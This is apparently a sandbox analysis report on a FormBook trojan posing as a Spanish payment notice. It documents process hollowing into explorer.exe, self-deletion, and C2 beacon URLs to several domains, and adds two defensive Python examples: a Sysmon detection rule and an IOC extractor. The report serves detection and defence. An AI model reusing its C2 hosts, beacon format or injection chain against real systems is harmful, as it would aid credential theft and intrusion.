Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.Notificaci#U00f3n de pago.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.4141a78.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Notificaci#U00f3n de pago.exe.3ffb388.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383525954.0000000001410000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.310859380.0000000003FFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (one technique per tactic column per row; the digits in front of a technique name are the badges the original matrix shows on techniques observed in this analysis, techniques without a badge were not observed):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 1 Shared Modules | Path Interception | 612 Process Injection | 1 Masquerading | OS Credential Dumping | 221 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 31 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 112 System Information Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 4 Obfuscated Files or Information | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 23 Software Packing | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 File Deletion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID: 626150; sample: Notificaci#U00f3n de pago.exe; start date: 13/05/2022; architecture: WINDOWS; score: 100), rendered as a process tree:

Start
  DNS: www.triptoasiam.com; www.massage-rino.com
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 8 other signatures
  -> Notificaci#U00f3n de pago.exe (started)
       Dropped file: C:\...\Notificaci#U00f3n de pago.exe.log (ASCII)
       Signature: Injects a PE file into a foreign processes
       -> Notificaci#U00f3n de pago.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 Network: www.librevillegabon.com 104.195.7.239, source port 49764, destination port 80 (ESITEDUS, United States); theguiriguide.com 192.0.78.25, source port 49761, destination port 80 (AUTOMATTICUS, United States); 4 other IPs or domains
                 Signature: System process connects to network (likely due to code injection or exploit)
                 -> WWAHost.exe (started)
                      Signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe (started)
                           -> conhost.exe (started)
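The behavior graph above shows two things a detection engineer would want to catch on an endpoint independently of the sample hash: a shell process (explorer.exe) that should never speak HTTP on its own suddenly connecting to attacker domains after being injected, and the injected host process (WWAHost.exe) spawning cmd.exe for the self-delete. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it runs both rules over constructed Sysmon-style ProcessCreate (EventID 1) and NetworkConnect (EventID 3) records that mirror the tree above. The process ids, the benign browser event, the set of "system processes" and the destination allowlist are assumptions for the example and should be tuned per estate.

```python
import ntpath

# Constructed sample input (not the sandbox's own log output): Sysmon-style
# ProcessCreate (EventID 1) and NetworkConnect (EventID 3) records that
# mirror the behavior graph in this report. Pids are arbitrary.
EVENTS = [
    {"EventID": 1, "ProcessId": 1234, "ParentProcessId": 900,
     "Image": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "ProcessId": 5120, "ParentProcessId": 1234,
     "Image": r"C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"},
    {"EventID": 1, "ProcessId": 5388, "ParentProcessId": 5120,
     "Image": r"C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"},
    {"EventID": 3, "ProcessId": 1234, "Image": r"C:\Windows\explorer.exe",
     "DestinationHostname": "www.librevillegabon.com", "DestinationPort": 80},
    {"EventID": 3, "ProcessId": 1234, "Image": r"C:\Windows\explorer.exe",
     "DestinationHostname": "theguiriguide.com", "DestinationPort": 80},
    {"EventID": 1, "ProcessId": 6100, "ParentProcessId": 1234,
     "Image": r"C:\Windows\System32\WWAHost.exe"},
    {"EventID": 1, "ProcessId": 6200, "ParentProcessId": 6100,
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "ProcessId": 6210, "ParentProcessId": 6200,
     "Image": r"C:\Windows\System32\conhost.exe"},
    # Benign control record: an ordinary browser talking to a vendor host.
    {"EventID": 3, "ProcessId": 7000, "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationHostname": "www.microsoft.com", "DestinationPort": 443},
]

# Rule parameters (assumptions for this example): shell/system binaries that
# should not initiate HTTP(S) themselves, destinations they may legitimately
# reach anyway, and the parent chain seen in the graph (child first).
SYSTEM_PROCESSES = {"explorer.exe"}
ALLOWED_SUFFIXES = (".microsoft.com", ".windows.com", ".windowsupdate.com")
INJECTION_CHAIN = ("cmd.exe", "wwahost.exe", "explorer.exe")


def build_process_table(events):
    """Map pid -> (image basename, parent pid) from ProcessCreate records."""
    table = {}
    for ev in events:
        if ev["EventID"] == 1:
            # ntpath handles backslash paths on any host OS.
            name = ntpath.basename(ev["Image"]).lower()
            table[ev["ProcessId"]] = (name, ev["ParentProcessId"])
    return table


def ancestry(table, pid):
    """Yield image basenames from pid upward until the parent is unknown."""
    seen = set()
    while pid in table and pid not in seen:
        seen.add(pid)
        name, pid = table[pid]
        yield name


def matches_chain(table, pid, chain):
    """True when pid's ancestry starts with the given child-first chain."""
    names = list(ancestry(table, pid))
    return tuple(names[: len(chain)]) == chain


def detect(events):
    """Return (rule, pid, detail) alerts for the two behaviours in the graph."""
    table = build_process_table(events)
    alerts = []
    for ev in events:
        if ev["EventID"] == 3:
            name = ntpath.basename(ev["Image"]).lower()
            host = ev["DestinationHostname"].lower()
            if name in SYSTEM_PROCESSES and not host.endswith(ALLOWED_SUFFIXES):
                alerts.append(("system_process_network", ev["ProcessId"], host))
        elif ev["EventID"] == 1 and matches_chain(table, ev["ProcessId"], INJECTION_CHAIN):
            alerts.append(("injected_host_spawns_cmd", ev["ProcessId"],
                           " <- ".join(INJECTION_CHAIN)))
    return alerts


if __name__ == "__main__":
    for rule, pid, detail in detect(EVENTS):
        print(f"{rule}: pid {pid}: {detail}")
```

The network rule fires twice here (both C2 hosts reached from explorer.exe) and the chain rule once (cmd.exe under WWAHost.exe under explorer.exe); conhost.exe does not fire because its ancestry does not begin with the chain. In production the allowlist is the part that needs care: explorer.exe does reach Microsoft endpoints on its own, so the rule is only as quiet as that list.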

Submitted sample (Source | Detection | Scanner | Label)
Notificaci#U00f3n de pago.exe | 21% | Virustotal |
Notificaci#U00f3n de pago.exe | 41% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook
Notificaci#U00f3n de pago.exe | 100% | Joe Sandbox ML |

Dropped files: No Antivirus matches

Unpacked PE files (Source | Detection | Scanner | Label)
8.0.Notificaci#U00f3n de pago.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.0.Notificaci#U00f3n de pago.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.0.Notificaci#U00f3n de pago.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
8.2.Notificaci#U00f3n de pago.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains (Source | Detection | Scanner | Label)
www.massage-rino.com | 0% | Virustotal |
theguiriguide.com | 0% | Virustotal |

URLs (Source | Detection | Scanner | Label)
http://www.fontbureau.comlvfetDm | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.founder.com.cn/cnG | 0% | URL Reputation | safe
http://www.sajatypeworks.comG | 0% | Avira URL Cloud | safe
http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/n | 0% | Avira URL Cloud | safe
http://www.fontbureau.comB.TTF?m | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Y0?m | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/hm? | 0% | Avira URL Cloud | safe
http://www.fontbureau.comcom | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/6m | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Y0 | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sajatypeworks.come | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.fontbureau.com.TTF | 0% | URL Reputation | safe
http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.comt | 0% | URL Reputation | safe
http://www.sajatypeworks.comt-bh | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Zm | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/jp/ | 0% | URL Reputation | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
http://www.fontbureau.como)m | 0% | Avira URL Cloud | safe
http://www.fontbureau.comd | 0% | URL Reputation | safe
http://en.w | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/)m | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
www.hkqhdq.com/d6fp/ | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.founder.com.cn/cnnt | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Dm | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/2 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/cm6 | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/qm( | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cne-dio | 0% | Avira URL Cloud | safe
http://www.fontbureau.comm | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/~mQ | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/Mm | 0% | Avira URL Cloud | safe
http://www.fontbureau.comsief | 0% | URL Reputation | safe
Contacted domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
www.triptoasiam.com | 162.0.216.71 | true | false | | unknown
www.massage-rino.com | 38.40.251.97 | true | false | | unknown
theguiriguide.com | 192.0.78.25 | true | true | | unknown
parkingpage.namecheap.com | 198.54.117.212 | true | false | | high
www.librevillegabon.com | 104.195.7.239 | true | true | | unknown
www.theguiriguide.com | unknown | unknown | true | | unknown
www.team-ctctitleco.com | unknown | unknown | true | | unknown
www.evertribute.com | unknown | unknown | true | | unknown
Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb | true | Avira URL Cloud: safe | unknown
http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb | true | Avira URL Cloud: safe | unknown
http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb | true | Avira URL Cloud: safe | unknown
www.hkqhdq.com/d6fp/ | true | Avira URL Cloud: safe | low
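The four URLs the sandbox marks malicious are worth more than their hostnames: they share one path directory ("d6fp") and, where a query is present, the same two parameter names carrying base64-like data, while every URL scanner in this report rates them "safe". The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: a small Python IOC extractor that separates those C2 URLs from the font-vendor strings in the same list, keeps the query payload unmodified, and emits a proxy-log regex for the campaign path. Treating "d6fp" as the campaign token, the base64-like alphabet check and the function names are assumptions drawn from this report alone, not a family-wide constant.

```python
import re
from urllib.parse import urlsplit

# Constructed sample input for this example: a subset of the URL strings
# listed in the report above, font-vendor metadata mixed with the four
# flagged C2 URLs.
REPORT_URLS = [
    "http://www.fontbureau.comlvfetDm",
    "http://www.founder.com.cn/cn/bThe",
    "http://www.tiro.com",
    "http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb",
    "http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb",
    "http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb",
    "www.hkqhdq.com/d6fp/",
    "http://www.jiyu-kobo.co.jp/",
    "http://www.galapagosdesign.com/staff/dennis.htm",
]

# Assumption for this example: the shared path directory observed in this
# report is the campaign token. It is specific to this sample's config.
CAMPAIGN_PATH = "d6fp"
QUERY_DATA_RE = re.compile(r"^[A-Za-z0-9+/=]+$")  # base64-like alphabet


def parse_c2_url(url, path_token=CAMPAIGN_PATH):
    """Return {'host', 'path', 'params'} if url uses the campaign path, else None.

    params is a list of (name, value) pairs kept raw on purpose: urllib's
    parse_qsl would turn '+' into a space and corrupt the encoded payload.
    """
    if "://" not in url:  # the report lists one URL without a scheme
        url = "http://" + url
    parts = urlsplit(url)
    if parts.path != f"/{path_token}/":
        return None
    params = []
    for pair in parts.query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((name, value))
    return {"host": parts.hostname, "path": parts.path, "params": params}


def looks_like_encoded_beacon(params):
    """True when every parameter value fits the base64-like alphabet."""
    return bool(params) and all(QUERY_DATA_RE.match(v) for _, v in params)


def extract_iocs(urls, path_token=CAMPAIGN_PATH):
    """Collect C2 hosts and query parameter names across a list of URLs."""
    hosts, names = set(), set()
    for url in urls:
        hit = parse_c2_url(url, path_token)
        if hit is None:
            continue
        hosts.add(hit["host"])
        names.update(n for n, _ in hit["params"])
    return {"hosts": sorted(hosts), "param_names": sorted(names),
            "path": f"/{path_token}/"}


def proxy_log_regex(path_token=CAMPAIGN_PATH):
    """Regex for grepping proxy logs for the same campaign path, any host."""
    return re.compile(r"^https?://[^/\s]+/" + re.escape(path_token) + r"/(\?\S*)?$")


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_URLS)
    print("C2 hosts:", ", ".join(iocs["hosts"]))
    print("query parameter names:", ", ".join(iocs["param_names"]))
    print("proxy regex:", proxy_log_regex().pattern)
```

The path-based match is deliberately host-agnostic: FormBook-style configs rotate through a list of domains (several of the ones above resolve to parking pages or nothing at all), so blocking on the four hostnames alone misses the next decoy, whereas the path directory is shared across the whole set in this report.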
URLs from memory and binary strings (Name | Source | Malicious | Antivirus Detection | Reputation)
http://www.fontbureau.com/designersG | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.comlvfetDm | Notificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/? | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.html0 | Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers? | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cnG | Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.comG | Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | Notificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, 